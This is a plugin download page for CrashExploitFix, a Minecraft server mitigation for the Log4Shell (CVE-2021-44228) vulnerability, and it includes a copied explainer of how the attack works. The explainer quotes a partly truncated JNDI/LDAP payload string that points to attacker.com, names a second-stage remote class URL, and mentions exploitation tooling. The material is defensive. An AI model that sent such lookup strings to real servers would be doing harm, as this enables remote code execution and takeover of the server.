CrashExploitFix - Speedgot

CrashExploitFix -----

Fixes the recent exploit which can cause your server to crash

Download Now
6 KB .jar

This plugin fixes most new exploits like the one that came out recently that could crash the server, for more information you can read https://hypixel.net/threads/psa-the...n-minecraft-and-its-by-typing-in-chat.4703238 /
Permission to receive message when somebody try to do the exploit: crashfix.receive

More updates soon !

Info About The Exploit:

A few hours ago, a 0-day exploit in the popular Java logging library log4j was discovered that results in Remote Code Execution (RCE) by logging a certain string.
Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We're calling it "Log4Shell" for short (CVE-2021-44228 just isn't as memorable).

Who is impacted?
Many, many services are vulnerable to this exploit. Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable.

Anybody using Apache Struts is likely vulnerable. We've seen similar vulnerabilities exploited before in breaches like the 2017 Equifax data breach.

Many Open Source projects like the Minecraft server, Paper, have already begun patching their usage of log4j.

Updates (3 hours after posting): According to this blog post (in english), JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are not affected by the LDAP attack vector. In these versions com.sun.jndi.ldap.object.trustURLCodebase is set to false meaning JNDI cannot load a remote codebase using LDAP.

However, there are other attack vectors targeting this vulnerability which can result in RCE. Depending on what code is present on the server, an attacker could leverage this existing code to execute a payload. An attack targeting the class org.apache.naming.factory.BeanFactory, present on Apache Tomcat servers, is discussed in this blog post.

How the exploit works
Exploit Requirements
- A server with a vulnerable log4j version (listed above),
- an endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send the exploit string,
- and a log statement that logs out the string from that request.
  Exploit Steps
  1. Data from the User gets sent to the server (via any protocol),
  2. The server logs the data in the request, containing the malicious payload: '${jn...:ldap://attacker.com/a}' (where attacker.com is an attacker controlled server),
  3. The log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI),
  4. This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process,
  5. This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.
  Due to how common Java vulnerabilities such as these are, security researchers have created tools to easily exploit them. The marshalsec project is one of many that demonstrates generating an exploit payload that could be used for this vulnerability. You can refer to this malicious LDAP server for an example of exploitation.
  
  Screenshots:
  
  Servers Using CrashExploitFix
  - play.magmacraft.club

View on SpigotMC

Resource Information

Author:

----------

Total Downloads: 1,063

First Release: Dec 10, 2021

Last Update: Dec 11, 2021

Category: ---------------

All-Time Rating:

2 ratings

Version -----

Released: --------------------

Downloads: ------

Version Rating:

----------------------

-- ratings